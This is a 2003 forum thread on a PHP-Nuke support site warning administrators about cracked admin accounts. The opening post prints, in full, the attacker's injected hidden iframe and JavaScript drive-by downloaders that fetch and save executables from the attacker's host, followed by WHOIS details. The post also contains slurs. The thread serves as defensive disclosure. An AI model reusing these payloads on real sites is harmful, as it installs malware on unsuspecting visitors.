You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 47 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Hacker Warning [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
Loki
Nuke Soldier
Nuke Soldier


Joined: Oct 16, 2003
Posts: 10


PostPosted: Wed Oct 15, 2003 8:35 pm Reply with quoteBack to top

Ok there are some little hackin fags out there messin with Nuke sites. One in particular is crackin admin passwords and adding this link to the footer box in the admin preferences section.

<iframe src="http://don.niggie.net/bla.html" width=0 height=0></iframe>

This in turn causing a html page to open on the main page of your site and continually flash. Encoded in this html page are a series of scripts Listed below.

1st Script

var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://don.niggie.net/hide.exe",0);

x.Send();
var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Outlook Express\\msimn.exe",2);
location.href = "mailto:";



2nd Script

function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp", "_media");
setTimeout("doit()", 50000);




You are then taken to "http://don.niggie.net/bla2.html"

Where this script runs.


var x = new ActiveXObject("Microsoft.XMLHTTP");

x.Open("GET", "http://don.niggie.net/ddos.exe",0);

x.Send();

var s = new ActiveXObject("ADODB.Stream");

s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";


Then this final script runs.


function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media")
}
window.open("error.jsp", "_media");
setTimeout("doit()", 5000);


What these scripts do is upload 2 files one called ddos.exe and the other called hide.exe that auto executes if you do not have a firewall up. These files shut down all access to your email accounts and also prevent you from opening any windows. When you try to open a cascading screen it immediately dissappears so you can't use it. Once they find your password they then add a script like this to your footer box in your admin preferences.

My advice- choose your admin username that is totally different from your Regular Username that makes it harder for them to find, since the cracker probably searches matches that they find to the registered username that shows up in your members list.

Number one tho immediately change all your passwords for all your users who have admin access, because if you havent done it yet. He can still get in your site.


THESE SITES ARE STILL UP AND RUNNING SO BEWARE... IT HAS BEEN REPORTED TO THE SERVICE PROVIDER THAT THIS INDIVIDUAL IS USING, BUT NOTHING HAS BEEN DONE.

Here is the info on this server he is using.

Target: don.niggie.net
Date: 10/12/2003 (Sunday), 6:56:03 PM
Nodes: 3


Node Data
Node Net Reg IP Address Location Node Name
3 1 1 68.145.203.69 51.000N, 113.750W h68-145-203-69.cg.shawcable.net


Packet Data
Node High Low Avg Tot Lost
3 ---- ---- ---- 20 20


Network Data
Network id#: 1

OrgName: Shaw Communications Inc.
OrgID: SHAWC
Address: Suite 800
Address: 630 - 3rd Ave. SW
City: Calgary
StateProv: AB
PostalCode: T2P-4L4
Country: CA

NetRange: 68.144.0.0 - 68.147.255.255
CIDR: 68.144.0.0/14
NetName: SHAW-COMM
NetHandle: NET-68-144-0-0-1
Parent: NET-68-0-0-0-0
NetType: Direct Allocation
NameServer: NS2SO.CG.SHAWCABLE.NET
NameServer: NS1SO.CG.SHAWCABLE.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-06-03
Updated: 2003-06-20

OrgAbuseHandle: SHAWA-ARIN
OrgAbuseName: SHAW ABUSE
OrgAbusePhone: +1-403-750-7420
OrgAbuseEmail: internet.abuse@sjrb.ca

OrgTechHandle: ZS178-ARIN
OrgTechName: Shaw High-Speed Internet
OrgTechPhone: +1-403-750-7428
OrgTechEmail: ipadmin@sjrb.ca

ARIN WHOIS database, last updated 2003-10-11 19:15




Registrant:
Shaw Cablesystems G.P. (SHAWCABLE7-DOM)
Suite 900 630-3rd Avenue S.W.
Calgary, AB T2P 4L4
CA

Domain Name: SHAWCABLE.NET

Administrative Contact:
Department, Legal (YFTGRLUJHI) legaldepartment@SJRB.CA
Suite 900, 630 - 3rd Avenue SW
Calgary, AB T2P 4L4
CA
1-403-750-4500 fax: 1-403-716-6544
Technical Contact:
Shaw Cablesystems G.P. (SC5338-ORG) internet.engineering@SHAW.CA
630 - 3rd Avenue S.W.
Calgary, AB T2P 4L4
CA
(403)750-4500 fax: (403)750-4504

Record expires on 05-Nov-2003.
Record created on 11-Oct-2002.
Database last updated on 12-Oct-2003 19:53:40 EDT.

Domain servers in listed order:

NS1SO.CG.SHAWCABLE.NET 24.64.63.195


Last edited by Loki on Thu Oct 16, 2003 8:11 am; edited 1 time in total
Find all posts by LokiView user's profileSend private messageVisit poster's website
chatserv
General
General


Joined: Jan 12, 2003
Posts: 3128

Location: Puerto Rico

PostPosted: Wed Oct 15, 2003 8:46 pm Reply with quoteBack to top

Patch your website with the fixes posted in the frontpage. the article has 4 download links, select the one for your version of Nuke.

_________________
Feed a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime.
ScriptHeaven | NukeResources
Find all posts by chatservView user's profileSend private messageVisit poster's website
Loki
Nuke Soldier
Nuke Soldier


Joined: Oct 16, 2003
Posts: 10


PostPosted: Wed Oct 15, 2003 8:54 pm Reply with quoteBack to top

Yup Already done it, just wanted to let others know of the details.
Find all posts by LokiView user's profileSend private messageVisit poster's website
Daniel-cmw
Site Admin
Site Admin


Joined: Mar 02, 2003
Posts: 1662

Location: The UK!

PostPosted: Thu Oct 16, 2003 12:07 am Reply with quoteBack to top

It may be a good idea to edit the link so people dont click on it and get infected like I just nearly did.

_________________
Read Me
Find all posts by Daniel-cmwView user's profileSend private message
Loki
Nuke Soldier
Nuke Soldier


Joined: Oct 16, 2003
Posts: 10


PostPosted: Thu Oct 16, 2003 8:13 am Reply with quoteBack to top

Oops didnt even notice that. Fixed..
Find all posts by LokiView user's profileSend private messageVisit poster's website
DaveTomneyUK
Lieutenant
Lieutenant


Joined: Sep 03, 2003
Posts: 162

Location: UK, England

PostPosted: Thu Oct 16, 2003 8:58 am Reply with quoteBack to top

where do i get the patch guys for this security hack my pc will be safe wont it i went to that site at "www.don.niggie.net/bla.html" but i have a firewall and nothing happened i had no popups or nothing and i searched for hide.exe and ddos.exe it found nothing?

cheers

the person who made that hack wants burning at the steak.
Find all posts by DaveTomneyUKView user's profileSend private messageVisit poster's website
dezina
Support Mod
Support Mod


Joined: Jun 09, 2003
Posts: 1713

Location: England

PostPosted: Thu Oct 16, 2003 9:16 am Reply with quoteBack to top

http://www.nukecops.com/modules.php?name=News&file=article&sid=816 Wink

_________________
Image
Backup files BEFORE altering
Use PHPNuke 7.6 with patches!!
No private messages please, POST in forums.
Find all posts by dezinaView user's profileSend private messageVisit poster's website
DaveTomneyUK
Lieutenant
Lieutenant


Joined: Sep 03, 2003
Posts: 162

Location: UK, England

PostPosted: Thu Oct 16, 2003 9:27 am Reply with quoteBack to top

cheers
Find all posts by DaveTomneyUKView user's profileSend private messageVisit poster's website
Minne
Lieutenant
Lieutenant


Joined: Jul 15, 2003
Posts: 150

Location: Small Sports

PostPosted: Sun Oct 19, 2003 8:09 pm Reply with quoteBack to top

but when u choose another user name for admin its so easy to find b/c when u post news it says posted by: username

so its not that tricky

_________________
Image
Find all posts by MinneView user's profileSend private messageVisit poster's websiteAIM Address
arghhhh
Nuke Soldier
Nuke Soldier


Joined: Oct 24, 2003
Posts: 13


PostPosted: Fri Oct 24, 2003 9:59 am Reply with quoteBack to top

Idiots!

They did it to our website, the same don.niggie thing.

Also created an admin account called BOO

I wonder what the point of them doing this is. Sad
Find all posts by arghhhhView user's profileSend private message
aleco
Nuke Cadet
Nuke Cadet


Joined: May 29, 2003
Posts: 3


PostPosted: Fri Oct 24, 2003 12:11 pm Reply with quoteBack to top

We got hacked too, but fixed it before anything much was done (only 2 people noticed something was wrong)

Anyway, upon inspection of the server logs, this is his/her ip address:
julie.nfrance.com

I can provide further details of activity if required - it looks like this person started going through hundreds of our files, stopped for a short period (a week or two) and then came back again just before the final hack. (presumably this was the time required to crack the passwords stored in the database?)

Also, should i send an email to anyone about this? eg our hosts, the hackers hosts, and Microsoft? I say Microsoft as it only appeared to affect IE, not Opera. Opera just opened a new window opened, leading to error.jsp. However I'm behind a firewall so didn't actually suffer from anything, so perhaps it was just me.

Anyway, any further info/help let me know!
Find all posts by alecoView user's profileSend private message
Zhen-Xjell
Nuke Cops Founder
Nuke Cops Founder


Joined: Nov 14, 2002
Posts: 5939


PostPosted: Sat Oct 25, 2003 12:17 pm Reply with quoteBack to top

Yes anything you can get from your logs to submit to their abuse agencies you should do immediately.

_________________
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki]
Find all posts by Zhen-XjellView user's profileSend private messageSend e-mailVisit poster's website
saupz
Nuke Cadet
Nuke Cadet


Joined: Oct 27, 2003
Posts: 1


PostPosted: Mon Oct 27, 2003 1:20 am Reply with quoteBack to top

sometimes hacker is good enough looking at our weakness.. but sometime they are good trying to help us in loking for the bug and hole

_________________
http://mercumaya.net
Find all posts by saupzView user's profileSend private message
Matrix28
Nuke Cadet
Nuke Cadet


Joined: Oct 26, 2003
Posts: 9


PostPosted: Mon Oct 27, 2003 10:48 am Reply with quoteBack to top

Thanks for the warning.

_________________
|M28|CF|BlueShad|LindonNet|Nintra|YY2
Find all posts by Matrix28View user's profileSend private messageVisit poster's website
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by · TOGETHER TEAM srl ITALY http://www.togetherteam.it · DONDELEO E-COMMERCE http://www.DonDeLeo.com
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.220 Seconds - 192 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::